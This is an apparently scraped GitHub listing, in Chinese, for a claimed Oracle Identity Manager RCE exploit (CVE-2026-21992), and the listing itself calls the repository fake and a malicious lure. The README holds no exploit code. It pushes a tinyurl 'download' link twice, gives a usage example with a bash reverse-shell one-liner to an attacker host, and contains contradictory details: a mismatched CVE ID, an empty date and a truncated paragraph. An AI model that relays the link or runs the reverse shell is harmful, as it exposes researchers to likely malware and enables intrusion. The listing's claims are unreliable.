TEXploited/CVE-2026-21992
GitHub: TEXploited/CVE-2026-21992
声称针对 Oracle Identity Manager 和 Web Services Manager 未经身份验证 RCE 漏洞的 Python 利用脚本,但仓库本身存在明显伪造和恶意诱饵特征。
Stars: 0 | Forks: 0
# CVE-2026-21992-Poc
## 概述
Oracle Fusion Middleware 的 Oracle Identity Manager 产品(组件:REST WebServices)和 Oracle Web Services Manager 产品(组件:Web Services Security)中存在漏洞。受影响的受支持版本为 12.2.1.4.0 和 14.1.2.1.0。该漏洞易于利用,允许拥有 HTTP 网络访问权限的未经身份验证攻击者入侵 Oracle Identity Manager 和 Oracle Web Services Manager。成功利用此漏洞进行攻击可能导致 Oracle Identity Manager 和 Oracle Web Services Manager 被接管。CVSS 3.1 基础分数 9.8(机密性、完整性和可用性影响)。CVSS 向量:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)。
## 利用:
### [点击此处下载](https://tinyurl.com/3u2cty8m)
## 详情
+ **CVE ID**: CVE-2026-21994
+ **发布时间**:
+ **影响**: 严重
+ **CVSS**: 9.8
+ **补丁可用性: (尚无官方补丁)**
## 影响
对于全球使用 Oracle Identity Manager 和 Oracle Web Services Manager 的组织而言,CVE-2026-21992 的影响是严重的。成功利用该漏洞可能导致系统被完全接管,使攻击者能够操纵身份管理流程,访问或篡改敏感的用户凭据,并破坏身份验证服务。这可能导致对 企业资源的未授权访问、数据泄露以及在企业网络内部潜在的横向移动。身份管理系统的受损破坏了对访问控制的信任,并可能促进对连接的应用程序和服务的进一步攻击。可用性影响可能导致服务中断,从而影响业务连续性。鉴于这些 Oracle 产品在管理身份和 Web 服务安全方面的关键作用,该漏洞对 企业 IT 环境的机密性、完整性和可用性构成了重大风险。严重依赖 Oracle Fusion Middleware 的金融、政府、医疗保健和电信等行业的组织面临的风险尤其高。在无需身份验证或用户交互的情况下即可轻松利用该漏洞,这增加了公开细节或利用程序后
## 受影响版本
+ Oracle Identity Manager,版本 12.2.1.4.0, 14.1.2.1.0
+ Oracle Web Services Manager,版本 12.2.1.4.0, 14.1.2.1.0
## 用法
基本反向 shell(bash 单行示例):
```
python3 exploit.py \
--url http://target:14000 \
--lhost 192.168.1.100 \
--lport 4444 \
--cmd "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"
```
## 联系方式
+ **如有疑问,请联系:evilxploits@outlook.com**
+ **利用程序** : [href](https://tinyurl.com/3u2cty8m)
标签:CISA项目, CVE-2026-21992, CVSS 9.8, Oracle Fusion Middleware, Oracle Identity Manager, Oracle Web Services Manager, PoC, REST WebServices, Takeover, Web Services Security, Web报告查看器, 暴力破解, 未经身份验证, 编程工具, 身份管理系统, 远程代码执行, 高严重性漏洞